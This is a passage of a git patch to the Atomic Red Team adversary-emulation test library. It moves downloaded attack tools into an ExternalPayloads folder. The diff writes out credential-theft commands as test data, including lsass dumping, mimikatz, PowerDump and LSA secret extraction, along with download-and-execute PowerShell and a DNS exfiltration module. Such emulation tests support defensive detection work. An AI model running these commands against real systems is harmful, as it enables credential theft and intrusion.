From 068d32b1ea81b7fe81be006b2f989b998dad20ae Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 15 Jun 2023 09:16:12 -0700 Subject: [PATCH] use ExternalPayloads directory (#2460) * use ExternalPayloads directory * use ExternalPayloads directory * use ExternalPayloads directory --- atomics/T1003.001/T1003.001.yaml | 32 ++++++++------ atomics/T1003.002/T1003.002.yaml | 6 +-- atomics/T1003.004/T1003.004.yaml | 8 ++-- atomics/T1021.002/T1021.002.yaml | 9 ++-- atomics/T1021.006/T1021.006.yaml | 5 ++- atomics/T1027/T1027.yaml | 17 ++++---- atomics/T1040/T1040.yaml | 10 +++-- atomics/T1046/T1046.yaml | 5 ++- atomics/T1047/T1047.yaml | 9 ++-- atomics/T1048.002/T1048.002.yaml | 9 ++-- atomics/T1048/T1048.yaml | 3 +- atomics/T1055/T1055.yaml | 9 ++-- atomics/T1059.003/T1059.003.yaml | 4 +- atomics/T1069.001/T1069.001.yaml | 3 +- atomics/T1070.006/T1070.006.yaml | 6 +-- atomics/T1071.001/T1071.001.yaml | 11 ++--- atomics/T1072/T1072.yaml | 10 +++-- atomics/T1082/T1082.yaml | 9 ++-- atomics/T1083/T1083.yaml | 10 ++--- atomics/T1087.002/T1087.002.yaml | 22 +++++----- atomics/T1090.003/T1090.003.yaml | 7 +-- atomics/T1095/T1095.yaml | 4 +- atomics/T1105/T1105.yaml | 56 ++++++++++++------------ atomics/T1110.001/T1110.001.yaml | 15 ++++--- atomics/T1110.002/T1110.002.yaml | 19 +++++---- atomics/T1110.003/T1110.003.yaml | 26 ++++++------ atomics/T1110.004/T1110.004.yaml | 17 ++++---- atomics/T1133/T1133.yaml | 5 ++- atomics/T1134.001/T1134.001.yaml | 18 ++++---- atomics/T1134.005/T1134.005.yaml | 3 +- atomics/T1135/T1135.yaml | 7 +-- atomics/T1187/T1187.yaml | 3 +- atomics/T1207/T1207.yaml | 12 +++--- atomics/T1219/T1219.yaml | 24 +++++++---- atomics/T1482/T1482.yaml | 9 ++-- atomics/T1485/T1485.yaml | 11 ++--- atomics/T1486/T1486.yaml | 5 ++- atomics/T1526/T1526.yaml | 9 ++-- atomics/T1528/T1528.yaml | 9 ++-- atomics/T1530/T1530.yaml | 13 +++--- atomics/T1539/T1539.yaml | 18 ++++---- atomics/T1546.015/T1546.015.yaml | 12 ++++-- atomics/T1547.008/T1547.008.yaml | 3 +- atomics/T1548.002/T1548.002.yaml | 73 ++++++++++++++++++-------------- atomics/T1550.003/T1550.003.yaml | 40 ++++++++--------- atomics/T1555.003/T1555.003.yaml | 71 ++++++++++++++++--------------- atomics/T1558.001/T1558.001.yaml | 3 +- atomics/T1558.002/T1558.002.yaml | 3 +- atomics/T1558.003/T1558.003.yaml | 3 +- atomics/T1558.004/T1558.004.yaml | 3 +- atomics/T1560.001/T1560.001.yaml | 5 ++- atomics/T1562.001/T1562.001.yaml | 35 ++++++++------- atomics/T1562.006/T1562.006.yaml | 7 +-- atomics/T1564.006/T1564.006.yaml | 9 ++-- atomics/T1567.002/T1567.002.yaml | 13 +++--- atomics/T1569.002/T1569.002.yaml | 31 ++++++-------- 56 files changed, 430 insertions(+), 368 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 366e622a..011aac54 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -20,7 +20,7 @@ atomic_tests: procdump_exe: description: Path of Procdump executable type: path - default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe dependency_executor_name: powershell dependencies: - description: | @@ -29,10 +29,11 @@ atomic_tests: if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" - Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null - Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force executor: command: | #{procdump_exe} -accepteula -ma lsass.exe #{output_file} @@ -70,7 +71,7 @@ atomic_tests: dumpert_exe: description: Path of Dumpert executable type: path - default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe + default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe dependency_executor_name: powershell dependencies: - description: | @@ -102,12 +103,13 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) + NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) prereq_command: | - if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" executor: command: | %temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" @@ -151,7 +153,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: string - default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | @@ -219,7 +221,7 @@ atomic_tests: description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. - Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: @@ -227,6 +229,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore @@ -251,7 +254,7 @@ atomic_tests: procdump_exe: description: Path of Procdump executable type: path - default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe dependency_executor_name: powershell dependencies: - description: | @@ -259,10 +262,11 @@ atomic_tests: prereq_command: | if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" - Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null - Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force executor: command: | #{procdump_exe} -accepteula -mm lsass.exe #{output_file} diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 158ff58a..5ec668a0 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -91,13 +91,13 @@ atomic_tests: - windows dependencies: - description: PowerDump script must exist on disk at specified location - prereq_command: 'if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} ' + prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1} ' get_prereq_command: |- - Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" + Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1" executor: command: |- Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green - Import-Module "$Env:Temp\PowerDump.ps1" + Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml index a2c915c1..3ad906ae 100644 --- a/atomics/T1003.004/T1003.004.yaml +++ b/atomics/T1003.004/T1003.004.yaml @@ -14,16 +14,16 @@ atomic_tests: psexec_exe: description: Path to PsExec executable type: path - default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe dependency_executor_name: powershell dependencies: - description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}' get_prereq_command: |- - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip" - Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip PathToAtomicsFolder\..\ExternalPayloads\PSTools -Force New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null - Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe #{psexec_exe} -Force executor: command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y' cleanup_command: del %temp%\secrets >nul 2> nul diff --git a/atomics/T1021.002/T1021.002.yaml b/atomics/T1021.002/T1021.002.yaml index 7b2d71ab..80521983 100644 --- a/atomics/T1021.002/T1021.002.yaml +++ b/atomics/T1021.002/T1021.002.yaml @@ -69,7 +69,7 @@ atomic_tests: psexec_exe: description: Path to PsExec type: string - default: C:\PSTools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe dependency_executor_name: powershell dependencies: - description: | @@ -77,10 +77,11 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_exe}" -Force executor: command: | #{psexec_exe} #{remote_host} -accepteula -c #{command_path} diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index 0bc77ab6..de7240e9 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml @@ -52,8 +52,9 @@ atomic_tests: - description: Computer must have Ruby Installed prereq_command: try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1} get_prereq_command: |- - Invoke-WebRequest -OutFile $env:Temp\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe - $file1= $env:Temp + "\rubyinstaller-2.7.1-1-x64.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe + $file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe" Start-Process $file1 /S; - description: Computer must have Evil-WinRM installed prereq_command: try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1} diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4ba4abdf..405a5fc7 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -101,13 +101,14 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe + T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe prereq_command: | - if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" - Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force executor: command: | "%temp%\temp_T1027.zip\T1027.exe" @@ -230,13 +231,13 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - T1027.js must exist on disk at $env:temp\temp_T1027js.zip\T1027js.js + T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js prereq_command: | - if (Test-Path $env:temp\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027js.zip" - Expand-Archive -path "$env:temp\T1027js.zip" -DestinationPath "$env:temp\temp_T1027js.zip\" -Force + Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force executor: command: | "%temp%\temp_T1027js.zip\T1027js.js" diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 7e7323f0..24662e65 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -91,14 +91,16 @@ atomic_tests: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} - Start-Process $env:temp\wireshark_installer.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe #{wireshark_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe /S - description: | npcap must be installed. prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} - Start-Process $env:temp\npcap_installer.exe + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe #{npcap_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe executor: command: | "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index 9a26d547..6a4fe601 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -88,8 +88,9 @@ atomic_tests: NMap must be installed prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} - Start-Process $env:temp\nmap-7.80-setup.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe #{nmap_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe /S executor: command: |- nmap #{host_to_scan} diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index ab4ac887..283244d9 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -163,7 +163,7 @@ atomic_tests: dll_to_execute: description: Path to DLL. type: string - default: $env:TEMP\calc.dll + default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll function_to_execute: description: Name of DLL function to call type: string @@ -173,6 +173,7 @@ atomic_tests: - description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute}) prereq_command: 'if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}' get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" executor: command: | @@ -199,12 +200,12 @@ atomic_tests: - description: TightVNC must be installed. prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1} get_prereq_command: |- - Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi + Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" start-sleep -s 10 - msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart + msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart start-sleep -s 15 executor: command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall - cleanup_command: msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart + cleanup_command: msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart name: command_prompt elevation_required: true diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml index 719338b8..52f26a3e 100644 --- a/atomics/T1048.002/T1048.002.yaml +++ b/atomics/T1048.002/T1048.002.yaml @@ -23,11 +23,10 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - description: | #{input_file} must be exist on system. prereq_command: | diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index c918f282..86b28242 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -69,7 +69,7 @@ atomic_tests: ps_module: description: DNSExfiltrator powershell ps_module type: path - default: '$env:Temp\dnsexfil.ps1' + default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1' doh: description: Google or CloudFlare DoH (DNS over HTTP) server type: string @@ -89,6 +89,7 @@ atomic_tests: prereq_command: | if (Test-Path #{ps_module}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} executor: command: | diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 57636b73..7a3a01b3 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -64,7 +64,7 @@ atomic_tests: psexec_path: description: Path to PsExec type: string - default: C:\PSTools\PsExec.exe + default: 'PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe' dependency_executor_name: powershell dependencies: - description: | @@ -86,10 +86,11 @@ atomic_tests: if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" -UseBasicParsing - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force executor: command: | #{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 8dd2bb78..d782a48b 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -15,7 +15,7 @@ atomic_tests: script_path: description: Script path. type: path - default: $env:TEMP\T1059.003_script.bat + default: PathToAtomicsFolder\..\ExternalPayloads\T1059.003_script.bat dependency_executor_name: powershell dependencies: - description: | @@ -83,7 +83,7 @@ atomic_tests: file_to_print: description: File to be opened/printed by Wordpad. type: string - default: $env:temp\T1059_003note.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1059_003note.txt max_to_print: description: The maximum number of Wordpad windows the test will open/print. type: integer diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml index 1e77608a..7dfffa82 100644 --- a/atomics/T1069.001/T1069.001.yaml +++ b/atomics/T1069.001/T1069.001.yaml @@ -55,7 +55,7 @@ atomic_tests: sharphound_path: description: SharpHound Windows executable type: path - default: '$env:TEMP\SharpHound.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\SharpHound.exe' output_path: description: Output for SharpHound type: path @@ -68,6 +68,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" executor: name: powershell diff --git a/atomics/T1070.006/T1070.006.yaml b/atomics/T1070.006/T1070.006.yaml index 07a98506..652f5ae8 100644 --- a/atomics/T1070.006/T1070.006.yaml +++ b/atomics/T1070.006/T1070.006.yaml @@ -123,7 +123,7 @@ atomic_tests: file_path: description: Path of file to change creation timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | @@ -152,7 +152,7 @@ atomic_tests: file_path: description: Path of file to change modified timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | @@ -181,7 +181,7 @@ atomic_tests: file_path: description: Path of file to change last access timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1071.001/T1071.001.yaml b/atomics/T1071.001/T1071.001.yaml index e7088bae..0320c63e 100644 --- a/atomics/T1071.001/T1071.001.yaml +++ b/atomics/T1071.001/T1071.001.yaml @@ -47,11 +47,12 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip executor: command: | #{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1 diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index 1adc6edc..94e84ce0 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml @@ -24,9 +24,10 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading radmin installer - (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}") + New-Item -Type Directory 